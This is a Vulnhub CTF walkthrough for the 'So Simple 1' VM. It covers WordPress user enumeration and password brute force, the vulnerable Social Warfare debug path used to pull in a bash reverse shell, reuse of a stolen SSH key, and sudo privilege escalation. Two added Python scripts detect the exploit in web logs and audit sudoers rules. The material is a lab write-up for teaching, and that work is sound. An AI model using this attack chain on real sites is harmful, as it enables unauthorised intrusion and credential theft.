So Simple-1 Vulnhub Walkthrough

Description From Vulnhub

Shubham Kumar
7 min read, Aug 22, 2020

This is an easy level VM with some rabbit holes. Enumeration is key to find your way in. There are three flags (2 users and 1 root flag). The VM is tested on Virtualbox. After the startup, it shows the IP address.

Once again I am here with another walkthrough of a vulnerable machine from Vulnhub.com. Credit for developing this machine goes to @roelvb79. For me, it took around 30–35 minutes to crack the machine as I am a bit lazy. Download it from https://www.vulnhub.com/entry/so-simple-1,515/

My recommendation is to run this machine on VirtualBox, but, as Walt Disney said, “Curiosity keeps leading us down new paths”, so you can also try VMware, and you can redo the challenge and find your own way of gaining root access.

For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. There are a lot of other challenging CTF machines available on vulnhub.com and I highly suggest attempting them, as it is a good way to sharpen your skills and also learn new techniques in a safe environment.

Starting the Journey

Network Scanning

A network scan is the most basic scan in its aims. Essentially, a network scan is used to determine where the live systems on the network are and how many of them there are, and for that I generally prefer the netdiscover command.

Looks like I got my target: 10.0.2.34

Port Scanning

Port scans go a bit deeper than network scans and provide not only a map of the target but also a list of open ports and the services running on a host. This gives a higher-resolution map than the network scan. Generally, the preferred tool for carrying out a port scan is Nmap, but one can use hping3 to do the same.

…and here we go: only two ports are open. If you want to learn about Nmap you can visit my previous walkthrough https://medium.com/@Shubham_Singh_/photographer-1-vulnhub-walkthrough-e7c1f3a5dde7

RECONNAISSANCE PHASE

Reconnaissance, also known as the preparatory phase, is where the hacker gathers information about a target before launching an attack; it is completed in phases prior to exploiting system vulnerabilities. What we are going to do here is investigate each open port for available vulnerabilities. So, let’s start…

Web Reconnaissance

As usual, I first visited port 80, which is the easy one, but found no valuable information there. I then ran a dirb scan to see whether any hidden directories were present, and yes, this time I was lucky. The site was developed using WordPress as a CMS. Let’s run WPScan against it…

dirb scan result

WordPress Scanning

WordPress scanning is carried out to see whether the plugins used by the site are up to date. If any of the plugins are outdated, we should check for known vulnerabilities in them.

wpscan command

For this particular scan you need your own API token: register at https://wpvulndb.com/api to get one, which allows a limited number of scans per day.

WPScan identifies the users admin and max and one plugin, Social Warfare v3.5.0, which has two vulnerabilities, as shown.

Now we run wpscan again, this time as a brute-force password attack, like this…

I recommend using the rockyou.txt wordlist file.

After the scan we have user max’s password: opensesame. Time to log in to the wp-admin login page. The max account doesn’t contain anything valuable for us. Then I tried searching for any available vulnerability in the Social Warfare plugin using searchsploit, and I got this

You can also Google it and you will find the same on the Exploit-DB page. Open the exploit page and you will find the vulnerable path (Vulpath) "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s".

Copy the path and paste it into the URL bar while logged in as max, and you will get a screen like this

This is the path through which we will get the reverse connection.

Steps for getting the reverse connection

  1. Create a file with any name and save it in .txt format.
  2. Go to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and copy the bash reverse shell script into the created file.
  3. Change the IP address to your Kali IP and the port you want to listen on for a connection.
  4. Start a local web server in your current working directory like this…
  5. Open another terminal and listen for the incoming connection using Netcat
  6. Go to the Vulpath and in place of %s type http://[kali_ip_address:server_port/created_file.txt]
  7. Open your listening terminal and wait for the reverse connection
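The same request, seen from the web server's side: this is an added example, not code from the original post, that scans constructed Apache-style access log lines for hits on the Social Warfare debug loader (swp_debug=load_options) and records the host the swp_url parameter points at, so a defender can spot the remote load described above. The log format, the client IP and the payload URL are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Standard combined-log prefix: client, ident, user, [timestamp], "METHOD target PROTO", status.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def swp_debug_load(target):
    """If the request hits the Social Warfare debug loader, return the swp_url host ('' if none)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-post.php"):
        return None
    query = parse_qs(parts.query)  # percent-decodes, so an encoded swp_url is seen as a URL
    if query.get("swp_debug", [""])[0] != "load_options":
        return None
    urls = query.get("swp_url", [])
    return (urlsplit(urls[0]).hostname or "") if urls else ""

def scan_log(lines):
    """Return (client_ip, timestamp, status, swp_url_host) for every request to the debug loader."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        host = swp_debug_load(m.group("target"))
        if host is not None:
            hits.append((m.group("ip"), m.group("ts"), m.group("status"), host))
    return hits

# Constructed sample lines: a normal admin-post call, a remote load via the debug parameter
# (swp_url percent-encoded as a browser sends it), and a probe of the loader with no swp_url.
SAMPLE_LOG = [
    '10.0.2.15 - - [22/Aug/2020:10:14:01 +0000] "POST /wp-admin/admin-post.php?action=save_settings HTTP/1.1" 302 0',
    '10.0.2.15 - - [22/Aug/2020:10:15:32 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options'
    '&swp_url=http%3A%2F%2F192.0.2.10%3A8000%2Fpayload.txt HTTP/1.1" 200 512',
    '10.0.2.15 - - [22/Aug/2020:10:16:05 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options HTTP/1.1" 200 512',
]

def demo():
    return scan_log(SAMPLE_LOG)

if __name__ == "__main__":
    for hit in demo():
        print("%s at %s -> status %s, swp_url host %r" % hit)
```

Any hit on this endpoint is worth an alert on a site that is not actively debugging the plugin; an off-site swp_url host is the signal that a payload was fetched from elsewhere.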

We did it. Now navigate to the home directory and you will find the folders of users max and steven. Enter the max folder and we find the user1.txt file, but we are unable to open it 😞

Checking the folder permissions, we can clearly see that we can access the .ssh folder. Inside it we found the id_rsa file, which looks like the private key for SSH login as user max.

Copy the private key into a new file on your machine and give that file permission 600 so that ssh does not refuse it.

SSH LOGIN

SSH login can be done in various ways, but since we have the private key we will use it to log in.

Logged in successfully!!! Now use the cat command to view the contents of user1.txt and we have our first flag 🤘 Time to get the next one.

Checking the sudo permissions of user max shows that he can run the following as sudo

Searching the web shows that we can abuse the service binary for privilege escalation and get access as another user.

Go to https://gtfobins.github.io/gtfobins/service/#sudo, copy the sudo command for privilege escalation, and then enter the famous Python one-liner to get a proper interactive shell…

…and we are logged in successfully as steven. Our second flag is here; access it using cat user2.txt 😈

Now check the sudo permissions of user steven as well, to see whether he can run any file as sudo.

Running the command shows that he can run server-health.sh in the /opt/tools path as root. Navigating to /opt, I find that there is no folder named tools. Seems like we have to create one using mkdir tools.

Now create a file named server-health.sh inside the tools folder and open it with nano. Enter the script as shown below…

…save it and make it executable using the chmod command.

Finally, run the file with sudo as the root user, providing the full path

…and here we go, we have root access. Now navigate to the root directory for the final flag ✌️
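Both sudo findings on this box (max allowed to run service, and steven's rule pointing at /opt/tools/server-health.sh, a path that did not exist and whose parent he could write to) are exactly what a sudoers audit should catch. This is an added example, not the author's or the box's code: it parses sudoers rule lines and flags unrestricted ALL commands, the service shell escape the page uses, and command targets that are missing or writable by others. The simplified rule syntax it accepts and the staged directory layout in demo() are assumptions.

```python
import os
import re
import tempfile

# Minimal sudoers rule parser, "user host=(runas) TAG: /cmd1 args, /cmd2"; assumes one rule per line,
# no aliases and no line continuations (enough for the rules seen on this box).
SUDO_RULE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?"
                       r"(?:[A-Z]+:\s*)*(?P<cmds>.+)$")
KNOWN_ESCAPES = {"service"}  # sudo shell escape documented on GTFOBins, as used on this box

def other_writable(path):
    return bool(os.stat(path).st_mode & 0o022)  # group- or world-write bit set

def nearest_existing(path):
    while not os.path.exists(path):  # walk up from a missing path to its closest existing ancestor
        path = os.path.dirname(path)
    return path

def audit_rule(line, root="/"):
    """Return (user, command, finding) tuples for one sudoers rule line."""
    m = SUDO_RULE.match(line.strip())
    if not m or m.group("user").startswith(("#", "Defaults")):
        return []
    user, findings = m.group("user"), []
    for cmd in m.group("cmds").split(","):
        path = cmd.strip().split()[0]
        if path == "ALL":
            findings.append((user, path, "unrestricted command (ALL)"))
            continue
        if os.path.basename(path) in KNOWN_ESCAPES:
            findings.append((user, path, "known sudo shell escape (see GTFOBins)"))
        full = os.path.join(root, path.lstrip("/"))  # 'root' lets a staged copy be audited
        if not os.path.exists(full):
            anc = nearest_existing(full)
            state = "writable by others" if other_writable(anc) else "not writable by others"
            findings.append((user, path, "target missing; ancestor %s is %s" % (anc, state)))
        elif other_writable(full) or other_writable(os.path.dirname(full)):
            findings.append((user, path, "target or its directory is writable by others"))
    return findings

def demo():
    """Stage the layout from the walkthrough (constructed) in a temp dir and audit two rules."""
    os.umask(0o022)  # make the staged modes deterministic
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "usr/sbin"))
    open(os.path.join(root, "usr/sbin/service"), "w").close()
    os.makedirs(os.path.join(root, "opt"))
    os.chmod(os.path.join(root, "opt"), 0o777)  # /opt/tools is absent and /opt is writable
    rules = "max ALL=(steven) /usr/sbin/service\nsteven ALL=(ALL) NOPASSWD: /opt/tools/server-health.sh"
    return [f[2] for line in rules.splitlines() for f in audit_rule(line, root)]
```

Run against a real host with audit_rule(line) on the lines of /etc/sudoers and /etc/sudoers.d/*; a missing target or a writable ancestor means whoever holds the rule can decide what runs as root.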

For more walkthroughs stay tuned…

Before you go

Visit my other walkthroughs:

And thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button (up to 40x) and share it to help others with similar interests! Feedback is always welcome!
